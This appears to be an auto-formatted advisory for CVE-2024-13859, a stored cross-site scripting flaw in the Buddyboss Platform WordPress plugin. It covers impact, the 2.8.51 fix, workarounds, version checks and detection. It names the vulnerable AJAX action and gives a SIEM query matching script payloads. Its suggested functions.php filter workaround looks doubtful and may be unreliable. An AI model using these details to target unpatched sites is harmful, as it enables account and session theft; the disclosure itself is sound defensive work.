CVE-2024-13859
📋 TL;DR
This vulnerability allows authenticated attackers with Subscriber-level access or higher to inject malicious scripts into WordPress pages using the Buddyboss Platform plugin. The scripts execute whenever users view the compromised pages, enabling session hijacking, credential theft, or malware distribution. All WordPress sites using Buddyboss Platform up to version 2.8.50 are affected.
💻 Affected Systems
- Buddyboss Platform WordPress Plugin
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, compromise user accounts, redirect users to malicious sites, or deploy malware across the entire WordPress site and its visitors.
Likely Case
Attackers with subscriber accounts inject malicious scripts to steal session cookies, redirect users to phishing pages, or deface website content.
If Mitigated
With proper input validation and output escaping, the attack surface is limited to authenticated users only, reducing the blast radius to internal user compromise rather than site-wide takeover.
🎯 Exploit Status
Exploitation requires authenticated access but is technically simple once an attacker has subscriber credentials. The vulnerability is well-documented and weaponization is likely given the popularity of WordPress plugins.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.8.51
Vendor Advisory: https://www.buddyboss.com/resources/buddyboss-platform-releases/2-8-51/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find Buddyboss Platform. 4. Click 'Update Now' if update is available. 5. If no update appears, download version 2.8.51+ from Buddyboss website and manually update.
🔧 Temporary Workarounds
Disable Media Uploads for Subscribers
allRestrict media upload capabilities to prevent exploitation via the vulnerable function.
Add to WordPress theme functions.php: add_filter('bp_nouveau_ajax_media_save', '__return_false');
Remove Subscriber Role Media Permissions
allUse WordPress role management plugins to revoke media-related capabilities from Subscriber role.
🧯 If You Can't Patch
- Implement Web Application Firewall (WAF) rules to block XSS payloads in media upload requests
- Regularly audit user accounts and remove inactive or suspicious Subscriber-level accounts
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins → Buddyboss Platform version. If version is 2.8.50 or lower, you are vulnerable.Check Version:
wp plugin list --name=buddyboss-platform --field=versionVerify Fix Applied:
After updating, verify version shows 2.8.51 or higher in WordPress plugins list.📡 Detection & Monitoring
Log Indicators:
- Unusual media upload activity from Subscriber accounts
- POST requests to /wp-admin/admin-ajax.php with action=bp_nouveau_ajax_media_save containing script tags
Network Indicators:
- Unexpected JavaScript payloads in media upload requests
- Increased admin-ajax.php requests from non-admin users
SIEM Query:
source="wordpress.log" AND (uri_path="/wp-admin/admin-ajax.php" AND parameters.action="bp_nouveau_ajax_media_save" AND (parameters.content CONTAINS "<script>" OR parameters.content CONTAINS "javascript:"))